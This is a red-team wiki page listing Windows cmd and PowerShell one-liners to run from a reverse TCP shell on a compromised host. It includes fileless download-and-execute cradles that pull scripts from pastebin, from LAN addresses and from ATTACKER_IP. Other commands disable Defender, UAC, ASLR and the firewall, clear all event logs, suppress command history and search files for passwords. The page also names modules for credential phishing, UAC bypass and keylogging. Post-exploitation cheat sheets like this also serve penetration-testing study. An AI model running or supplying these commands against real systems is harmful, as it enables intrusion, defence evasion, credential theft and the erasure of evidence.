
CmdLine & Scripts for reverse TCP shell addicts

pedro ubuntu edited this page Dec 6, 2020 · 172 revisions


:octocat: Description

This wiki describes some of the available command lines and scripts that can be executed directly in our reverse TCP shell prompt
to help pentesters (red teams) in their enumeration tasks, or to perform simple remote host shell functions (one-liners).



:octocat: Wiki Jump Links

[1] - Enumeration
[2] - NetWork
[3] - FileSystem
[4] - Credentials
[5] - Auxiliary-Modules



:octocat: Enumeration

| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Target host enumeration | 🚢 UserLand | cmd or powershell | systeminfo |

systeminfo|findstr "Host OS Type"



| Description | Privileges | Interpreter |
|---|---|---|
| List Host Accounts | 🚢 UserLand | powershell |

Get-LocalUser|Select-Object Name,Enabled,Description



| Description | Privileges | Interpreter |
|---|---|---|
| List last logon | 🚢 UserLand | powershell |

Get-LocalUser|ft Name,Enabled,LastLogon



| Description | Privileges | Interpreter | Storage |
|---|---|---|---|
| Capture desktop screenshot and save to TMP (FileLess) | 🚢 UserLand | powershell | FileLess + $Env:TMP (screenshots) |

iex(iwr("https://pastebin.com/raw/L8BVTDV6"))



| Description | Privileges | Interpreter | LolBin | Storage |
|---|---|---|---|---|
| Capture screenshots of mouse clicks for 4 seconds | 🚢 UserLand | powershell | psr.exe | $Env:TMP (SHot.zip) |

psr.exe /start /output $Env:TMP\SHot.zip /sc 1 /gui 0;Start-Sleep -Seconds 4;psr.exe /stop



| Description | Privileges | Interpreter |
|---|---|---|
| List Host Scheduled Tasks | 🚢 UserLand | cmd or powershell |

cmd /c schtasks|findstr "Ready Running"



| Description | Privileges | Interpreter |
|---|---|---|
| List Host Process(es) Running | 🚢 UserLand | powershell |

Get-Process|Select-Object Name,Path,Company,Product,StartTime



| Description | Privileges | Interpreter |
|---|---|---|
| List Host Process(es) Running | 🚢 UserLand | cmd or powershell |

cmd /c tasklist /SVC



| Description | Privileges | Interpreter |
|---|---|---|
| Stop remote process(es) | 🚢 UserLand | cmd or powershell |

cmd /c Taskkill /F /IM Python.exe



| Description | Privileges | Interpreter |
|---|---|---|
| List Host Applications Installed | 🚢 UserLand | powershell |

Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* |Select-Object DisplayName, DisplayVersion|Format-Table -AutoSize



| Description | Privileges | Interpreter |
|---|---|---|
| Anti-Virus Enumeration | 🚢 UserLand | powershell |

Get-MpComputerStatus



:octocat: NetWork

| Description | Privileges | Interpreter |
|---|---|---|
| List established connections | 🚢 UserLand | cmd or powershell |

cmd /c netstat -ano|findstr "ESTABLISHED"



| Description | Privileges | Interpreter |
|---|---|---|
| List established connections | 🚢 UserLand | powershell |

Get-NetTcpConnection -State "Established"|Format-Table -AutoSize



| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Start Firefox browser at the selected URL | 🚢 UserLand | cmd or powershell | firefox.exe |

cmd /c start firefox.exe https://www.bing.com/search?q=hacking



| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Start webserver in current directory | 🚢 UserLand | cmd or powershell | python.exe |

python -m http.server --bind 192.168.1.72 8080



| Description | Privileges | Interpreter | Storage |
|---|---|---|---|
| Download cmdlet to target machine and exec (FileLess) | 🚢 UserLand | powershell | FileLess |

iex(iwr("http://192.168.1.72/webserver.ps1"))



| Description | Privileges | Interpreter | Storage |
|---|---|---|---|
| Download cmdlet to target machine | 🚢 UserLand | powershell | $Env:TMP |

iwr -Uri http://192.168.1.72/webserver.ps1 -OutFile $env:tmp\webserver.ps1



| Description | Privileges | Interpreter | LolBin | Storage |
|---|---|---|---|---|
| Download cmdlet to target machine and exec (FileLess) | 🚢 UserLand | powershell | Msxml2.XMLHTTP | FileLess |

$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText



| Description | Privileges | Interpreter |
|---|---|---|
| List target host interfaces | 🚢 UserLand | powershell |

Get-NetIPConfiguration|ft InterfaceAlias,InterfaceDescription,IPv4Address



| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Fetch HTTP headers | 🚢 UserLand | cmd or powershell | curl.exe |

cmd /c curl --head "https://example.com"



| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| List contents of remote directory | 🚢 UserLand | cmd or powershell | curl.exe |

cmd /c curl --list-only "https://example.com/foo/"



| Description | Privileges | Interpreter |
|---|---|---|
| List Host DNS Cache Entries | 🚢 UserLand | cmd or powershell |

cmd /c ipconfig /displaydns|findstr /C:"Record Name" /C:"A (Host) Record"



| Description | Privileges | Interpreter |
|---|---|---|
| List Host DNS Cache Entries | 🚢 UserLand | WMI + powershell |

Get-WmiObject -query "Select * from MSFT_DNSClientCache" -Namespace "root\standardcimv2" -ErrorAction stop|Select-Object Entry,Name,Data|Format-Table -Wrap|Out-String



| Description | Privileges | Interpreter |
|---|---|---|
| List Host DNS Cache Entries | 🚢 UserLand | powershell |

Get-DNSClientCache|Select-Object Entry,Data|Format-Table -AutoSize



| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| List firewall rules (all profiles) | 🚢 UserLand | cmd or powershell | netsh.exe |

cmd /c netsh advfirewall show allprofiles



| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| List firewall rules (current profile) | 🚢 UserLand | cmd or powershell | netsh.exe |

cmd /c netsh advfirewall show currentprofile



| Description | Privileges | Interpreter |
|---|---|---|
| List SMB shares | 🚢 UserLand | powershell |

Get-SmbShare|Select-Object Name,Path,Description



| Description | Privileges | Interpreter |
|---|---|---|
| Get browser User-Agent | 🚢 UserLand | powershell |

Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\internet settings" -Name 'User Agent' -ErrorAction SilentlyContinue|Select-Object 'User Agent'



| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Stop remote firewall | 🔑 Administrator | cmd or powershell | netsh.exe |

cmd /c netsh advfirewall set allprofiles state off



| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Start remote firewall | 🔑 Administrator | cmd or powershell | netsh.exe |

cmd /c netsh advfirewall set allprofiles state on



| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Add rule to firewall (by port) | 🔑 Administrator | cmd or powershell | netsh.exe |

cmd /c netsh advfirewall firewall add rule name="Mine Webserver" dir=in action=allow protocol=TCP localport=8080



| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Add rule to firewall (by program) | 🔑 Administrator | cmd or powershell | netsh.exe |

netsh advfirewall firewall add rule name="Mine Webserver" description="venom v1.0.17 - python (SE) webserver" program="$Env:LOCALAPPDATA\Programs\python.exe" dir=in action=allow protocol=TCP enable=yes



| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Delete rule from firewall | 🔑 Administrator | cmd or powershell | netsh.exe |

cmd /c netsh advfirewall firewall delete rule name="Mine Webserver"



| Description | Privileges | Interpreter |
|---|---|---|
| Delete rule from firewall | 🔑 Administrator | powershell |

Remove-NetFirewallRule -DisplayName "Mine Webserver"



| Description | Privileges | Interpreter | LolBin |
|---|---|---|---|
| Review firewall rule (by name) | 🔑 Administrator | cmd or powershell | netsh.exe |

netsh advfirewall firewall show rule name="Mine Webserver"



:octocat: FileSystem

| Description | Privileges | Interpreter |
|---|---|---|
| Print working directory | 🚢 UserLand | cmd or powershell |

pwd



| Description | Privileges | Interpreter |
|---|---|---|
| Hide file with 'hidden' and 'system' attributes | 🚢 UserLand | cmd or powershell |

cmd /c attrib +H +S C:\path\to\your\file.doc



| Description | Privileges | Interpreter |
|---|---|---|
| Un-hide file (remove 'hidden' and 'system' attributes) | 🚢 UserLand | cmd or powershell |

cmd /c attrib -H -S C:\path\to\your\file.doc



| Description | Privileges | Interpreter |
|---|---|---|
| List hidden files recursively | 🚢 UserLand | cmd or powershell |

cmd /c dir %USERPROFILE% /A:H /S /B



| Description | Privileges | Interpreter |
|---|---|---|
| List ADS (Alternate Data Streams) entries | 🚢 UserLand | cmd or powershell |

cmd /c dir /r



| Description | Privileges | Interpreter |
|---|---|---|
| List all event logs | 🚢 UserLand | powershell |

Get-EventLog -List



| Description | Privileges | Interpreter |
|---|---|---|
| Read FileName.txt text file on terminal (PS) | 🚢 UserLand | powershell |

Get-Content FileName.txt



| Description | Privileges | Interpreter |
|---|---|---|
| Read FileName.txt text file on terminal (cmd) | 🚢 UserLand | cmd or powershell |

cmd /c type FileName.txt



| Description | Privileges | Interpreter |
|---|---|---|
| List startup entries | 🚢 UserLand | powershell |

Get-CimInstance Win32_StartupCommand|Select-Object Name,Command,Location,User



| Description | Privileges | Interpreter |
|---|---|---|
| List last 10 System event log entries | 🚢 UserLand | powershell |

Get-EventLog -LogName "System" -newest 10



| Description | Privileges | Interpreter |
|---|---|---|
| List last 10 Security event log entries | 🚢 UserLand | powershell |

Get-EventLog -LogName "Security" -newest 10



| Description | Privileges | Interpreter |
|---|---|---|
| List last 10 Windows PowerShell event log entries | 🚢 UserLand | powershell |

Get-EventLog -LogName "Windows Powershell" -newest 10



| Description | Privileges | Interpreter |
|---|---|---|
| List installed software (Program Files directories) | 🚢 UserLand | powershell |

Get-ChildItem "C:\Program Files", "C:\Program Files (x86)"|ft Parent,Name,LastWriteTime



| Description | Privileges | Interpreter |
|---|---|---|
| Shutdown (restart, /r) remote PC in 10 seconds | 🚢 UserLand | cmd or powershell |

cmd /R shutdown /r /c "my shutdown msg" /t 10



| Description | Privileges | Interpreter |
|---|---|---|
| List Recycle Bin entries | 🚢 UserLand | powershell |

$shell = New-Object -com shell.application;$rb = $shell.Namespace(10);$rb.Items()



| Description | Privileges | Interpreter |
|---|---|---|
| List host drives available | 🚢 UserLand | powershell |

Get-PSDrive -PSProvider 'FileSystem'|Select-Object Name,Used,Free,Root|Format-Table



| Description | Privileges | Interpreter |
|---|---|---|
| Hide drives from Explorer | 🔑 Administrator | cmd or powershell |

cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f;cmd /c taskkill /F /IM explorer.exe;start explorer.exe



| Description | Privileges | Interpreter |
|---|---|---|
| Show drives in Explorer | 🔑 Administrator | powershell |

Remove-Itemproperty -path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\policies\Explorer' -Name 'NoDrives' -Force;cmd /c taskkill /F /IM explorer.exe;start explorer.exe



| Description | Privileges | Interpreter |
|---|---|---|
| Clear Windows event logs | 🔑 Administrator | powershell |

wevtutil el|Foreach-Object {wevtutil cl "$_"}



| Description | Privileges | Interpreter |
|---|---|---|
| Disable remote UAC | 🔑 Administrator | powershell |

Set-Itemproperty -path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\policies\system' -Name 'EnableLUA' -value 0 -Force



| Description | Privileges | Interpreter |
|---|---|---|
| Disable remote ASLR | 🔑 Administrator | powershell |

Set-Itemproperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management' -Name 'MoveImages' -value 0 -Force



| Description | Privileges | Interpreter |
|---|---|---|
| Disable Task Manager | 🔑 Administrator | cmd or powershell |

cmd /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableTaskMgr /t REG_DWORD /d 1 /f;cmd /c taskkill /F /IM explorer.exe;start explorer.exe



| Description | Privileges | Interpreter |
|---|---|---|
| Enable Task Manager | 🔑 Administrator | cmd or powershell |

cmd /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableTaskMgr /t REG_DWORD /d 0 /f;cmd /c taskkill /F /IM explorer.exe;start explorer.exe



:octocat: Credentials

⭕ List User Tokens 🔑 Privileges: UserLand

whoami /priv

⭕ List Host Groups Available (SID) 🔑 Privileges: UserLand

Get-LocalUser|Select-Object -Property Name,SID,Enabled,PasswordRequired,LastLogon|ft

⭕ List Host Folder Permissions (Get-Acl) 🔑 Privileges: UserLand

Get-Acl $Env:PROGRAMFILES

⭕ List Host Folder Permissions (icacls) 🔑 Privileges: UserLand

icacls "$Env:PROGRAMFILES"

⭕ List folders with 'Everyone' Permissions 🔑 Privileges: UserLand

Get-ChildItem "C:\Program Files*", "C:\Program Files (x86)*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "Everyone"} } catch {}}

⭕ List Host Unquoted Service Paths 🔑 Privileges: UserLand

gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode|Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows\*" -and $_.PathName -notlike '"*"'} | Select PathName,DisplayName,Name

⭕ List Folder(s) Weak Permissions Recursively 🔑 Privileges: UserLand

icacls $env:programfiles\* > $env:tmp\WeakDirs.txt;$check_ACL = Get-Content $env:tmp\WeakDirs.txt|findstr /I /C:"Everyone:"|findstr "(F) (R) (W)";If($check_ACL){Get-Content $env:tmp\WeakDirs.txt};Remove-Item $env:tmp\WeakDirs.txt -Force

⭕ Search for Rotten Potato Vulnerability 🔑 Privileges: UserLand

cmd /R whoami /priv|findstr /i /C:"SeImpersonatePrivilege" /C:"SeAssignPrimaryTokenPrivilege" /C:"SeTcbPrivilege" /C:"SeBackupPrivilege" /C:"SeRestorePrivilege" /C:"SeCreateTokenPrivilege" /C:"SeLoadDriverPrivilege" /C:"SeTakeOwnershipPrivilege" /C:"SeDebugPrivilege" > dellog.txt;$check_ACL = Get-Content dellog.txt|findstr /i /C:"Enabled";If($check_ACL){echo "[i] Rotten Potato Vulnerable Settings Found [Enabled] ..`n";Get-Content dellog.txt}Else{echo "[i] Rotten Potato not found in current system .."};Remove-Item dellog.txt -Force

⭕ Check reverse TCP shell privileges 🔑 Privileges: UserLand

$IsClientAdmin = [bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544");If($IsClientAdmin){echo "[i] Running under Administrator Privileges .."}Else{write-host "[i] Running under UserLand Privileges .."}

⭕ Disable AV Real-time Monitoring 🔑 Privileges: UserLand

Set-MpPreference -DisableRealtimeMonitoring $True

⭕ Disable PowerShell command logging 🔑 Privileges: UserLand

Set-PSReadlineOption -HistorySaveStyle SaveNothing

⭕ Search for passwords inside text (txt) or log (log) files recursively 🔑 Privileges: UserLand

cd $Env:USERPROFILE;findstr /s /I "passw" *.txt *.log >> $Env:TMP\passwd.txt;findstr /s /I "login" *.txt *.log >> $Env:TMP\passwd.txt;Get-Content $Env:TMP\passwd.txt;Remove-Item $Env:TMP\passwd.txt -Force

⭕ PowerShell Constrained Language Bypass 🔑 Privileges: UserLand

powershell -v 2 -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"

⭕ Change execution policy for this session 🔑 Privileges: UserLand

Set-ExecutionPolicy Bypass -Scope Process



:octocat: Auxiliary-Modules

| Module | Description |
|---|---|
| GetBrowsers.ps1 | Enumerate remote host browsers (Home Page, All Browser Versions, Accepted Language, Download Directory, History, Bookmarks, Extensions, Start Page, Stored Creds, User-Agent, logins stored). |
| CredsPhish.ps1 | Standalone PowerShell script that will prompt the current user for a valid credential. |
| CompDefault.ps1 | UAC bypass module, or to execute one command with high privileges (Admin). |
| keylooger.ps1 | Standalone PowerShell script to capture keyboard keystrokes. |
| webserver.ps1 | Cmdlet to download files from the compromised PC. |



:octocat: SSA RedTeam @2020